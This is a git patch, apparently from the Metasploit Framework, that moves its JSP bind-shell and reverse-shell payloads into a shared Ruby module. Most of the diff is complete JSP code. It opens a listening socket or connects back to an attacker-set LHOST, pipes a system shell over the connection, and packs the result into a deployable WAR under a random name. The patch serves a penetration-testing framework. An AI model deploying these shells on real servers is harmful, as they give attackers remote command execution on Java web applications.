From 0725b9c69caab3acc3ad87d5c64ba06b6610a908 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 31 Dec 2013 08:27:37 -0600 Subject: [PATCH] Refactor JSP payloads --- lib/msf/core/payload.rb | 1 + lib/msf/payload/jsp.rb | 154 ++++++++++++++++++ .../singles/java/jsp_shell_bind_tcp.rb | 88 +--------- .../singles/java/jsp_shell_reverse_tcp.rb | 87 +--------- 4 files changed, 159 insertions(+), 171 deletions(-) create mode 100644 lib/msf/payload/jsp.rb diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb index f3e981db47..17dd28c5dc 100644 --- a/lib/msf/core/payload.rb +++ b/lib/msf/core/payload.rb @@ -29,6 +29,7 @@ class Payload < Msf::Module require 'msf/core/payload/netware' require 'msf/core/payload/java' require 'msf/core/payload/dalvik' + require 'msf/payload/jsp' ## # diff --git a/lib/msf/payload/jsp.rb b/lib/msf/payload/jsp.rb new file mode 100644 index 0000000000..57fade18b8 --- /dev/null +++ b/lib/msf/payload/jsp.rb @@ -0,0 +1,154 @@ +# -*- coding: binary -*- +require 'msf/core' +require 'rex' + +module Msf::Payload::JSP + # Outputs jsp that spawns a bind TCP shell + # @return [String] jsp code that executes bind TCP payload + def jsp_bind_tcp + # Modified from: http://www.security.org.sg/code/jspreverse.html + jsp = <<-EOS + <%@page import="java.lang.*"%> + <%@page import="java.util.*"%> + <%@page import="java.io.*"%> + <%@page import="java.net.*"%> + + <% + class StreamConnector extends Thread + { + InputStream is; + OutputStream os; + + StreamConnector( InputStream is, OutputStream os ) + { + this.is = is; + this.os = os; + } + + public void run() + { + BufferedReader in = null; + BufferedWriter out = null; + try + { + in = new BufferedReader( new InputStreamReader( this.is ) ); + out = new BufferedWriter( new OutputStreamWriter( this.os ) ); + char buffer[] = new char[8192]; + int length; + while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) + { + out.write( buffer, 0, length ); + out.flush(); + } + } catch( Exception e ){} + try + { + if( in != null ) + in.close(); + if( out != null ) + out.close(); + } catch( Exception e ){} + } + } + + try + { + ServerSocket server_socket = new ServerSocket( #{datastore['LPORT'].to_s} ); + Socket client_socket = server_socket.accept(); + server_socket.close(); + Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" ); + ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start(); + ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start(); + } catch( Exception e ) {} + %> + EOS + + return jsp.gsub(/^\s{6}/, '') + end + + # Outputs jsp code that spawns a reverse TCP shell + # @return [String] jsp code that executes reverse TCP payload + def jsp_reverse_tcp + # JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html + jsp = <<-EOS + <%@page import="java.lang.*"%> + <%@page import="java.util.*"%> + <%@page import="java.io.*"%> + <%@page import="java.net.*"%> + + <% + class StreamConnector extends Thread + { + InputStream is; + OutputStream os; + + StreamConnector( InputStream is, OutputStream os ) + { + this.is = is; + this.os = os; + } + + public void run() + { + BufferedReader in = null; + BufferedWriter out = null; + try + { + in = new BufferedReader( new InputStreamReader( this.is ) ); + out = new BufferedWriter( new OutputStreamWriter( this.os ) ); + char buffer[] = new char[8192]; + int length; + while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) + { + out.write( buffer, 0, length ); + out.flush(); + } + } catch( Exception e ){} + try + { + if( in != null ) + in.close(); + if( out != null ) + out.close(); + } catch( Exception e ){} + } + } + + try + { + Socket socket = new Socket( "#{datastore['LHOST']}", #{datastore['LPORT'].to_s} ); + Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" ); + ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); + ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); + } catch( Exception e ) {} + %> + EOS + return jsp.gsub(/^\s{6}/, '') + end + + # Wraps the jsp payload into a war + # @return [Rex::Zip::Jar] a war to execute the jsp payload + def generate_war + jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp" + + zip = Rex::Zip::Jar.new + + web_xml = <<-EOF + + + + + #{jsp_name} + + + EOF + + zip.add_file("WEB-INF/", '') + zip.add_file("WEB-INF/web.xml", web_xml) + zip.add_file(jsp_name, generate) + + zip + end +end diff --git a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb index 3959e86377..a82e42814a 100644 --- a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb @@ -12,6 +12,7 @@ require 'rex' module Metasploit3 include Msf::Payload::Single + include Msf::Payload::JSP include Msf::Sessions::CommandShellOptions def initialize(info = {}) @@ -35,92 +36,7 @@ module Metasploit3 def generate - # Modified from: http://www.security.org.sg/code/jspreverse.html - jsp = %q{ - <%@page import="java.lang.*"%> - <%@page import="java.util.*"%> - <%@page import="java.io.*"%> - <%@page import="java.net.*"%> - - <% - class StreamConnector extends Thread - { - InputStream is; - OutputStream os; - - StreamConnector( InputStream is, OutputStream os ) - { - this.is = is; - this.os = os; - } - - public void run() - { - BufferedReader in = null; - BufferedWriter out = null; - try - { - in = new BufferedReader( new InputStreamReader( this.is ) ); - out = new BufferedWriter( new OutputStreamWriter( this.os ) ); - char buffer[] = new char[8192]; - int length; - while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) - { - out.write( buffer, 0, length ); - out.flush(); - } - } catch( Exception e ){} - try - { - if( in != null ) - in.close(); - if( out != null ) - out.close(); - } catch( Exception e ){} - } - } - - try - { - ServerSocket server_socket = new ServerSocket( LPORT ); - Socket client_socket = server_socket.accept(); - server_socket.close(); - Process process = Runtime.getRuntime().exec( "SHELL" ); - ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start(); - ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start(); - } catch( Exception e ) {} - %> - } - - jsp = jsp.gsub( "LPORT", datastore['LPORT'].to_s ) - - jsp = jsp.gsub( "SHELL", datastore['SHELL'] ) - - return super + jsp - end - - def generate_war - jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp" - - zip = Rex::Zip::Jar.new - - web_xml = <<-EOF - - - - - #{jsp_name} - - - EOF - - zip.add_file("WEB-INF/", '') - zip.add_file("WEB-INF/web.xml", web_xml) - zip.add_file(jsp_name, generate) - - zip + return super + jsp_bind_tcp end end diff --git a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb index 47c02d0c14..aa7bce4b28 100644 --- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb @@ -11,6 +11,7 @@ require 'msf/base/sessions/command_shell_options' module Metasploit3 include Msf::Payload::Single + include Msf::Payload::JSP include Msf::Sessions::CommandShellOptions def initialize(info = {}) @@ -34,96 +35,12 @@ module Metasploit3 def generate - # JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html - jsp = %q{ - <%@page import="java.lang.*"%> - <%@page import="java.util.*"%> - <%@page import="java.io.*"%> - <%@page import="java.net.*"%> - - <% - class StreamConnector extends Thread - { - InputStream is; - OutputStream os; - - StreamConnector( InputStream is, OutputStream os ) - { - this.is = is; - this.os = os; - } - - public void run() - { - BufferedReader in = null; - BufferedWriter out = null; - try - { - in = new BufferedReader( new InputStreamReader( this.is ) ); - out = new BufferedWriter( new OutputStreamWriter( this.os ) ); - char buffer[] = new char[8192]; - int length; - while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) - { - out.write( buffer, 0, length ); - out.flush(); - } - } catch( Exception e ){} - try - { - if( in != null ) - in.close(); - if( out != null ) - out.close(); - } catch( Exception e ){} - } - } - - try - { - Socket socket = new Socket( "LHOST", LPORT ); - Process process = Runtime.getRuntime().exec( "SHELL" ); - ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); - ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); - } catch( Exception e ) {} - %> - } if( !datastore['LHOST'] or datastore['LHOST'].empty? ) return super end - jsp = jsp.gsub( "LHOST", datastore['LHOST'] ) - - jsp = jsp.gsub( "LPORT", datastore['LPORT'].to_s ) - - jsp = jsp.gsub( "SHELL", datastore['SHELL'] ) - - return super + jsp - end - - def generate_war - jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp" - - zip = Rex::Zip::Jar.new - - web_xml = <<-EOF - - - - - #{jsp_name} - - - EOF - - zip.add_file("WEB-INF/", '') - zip.add_file("WEB-INF/web.xml", web_xml) - zip.add_file(jsp_name, generate) - - zip + return super + jsp_reverse_tcp end end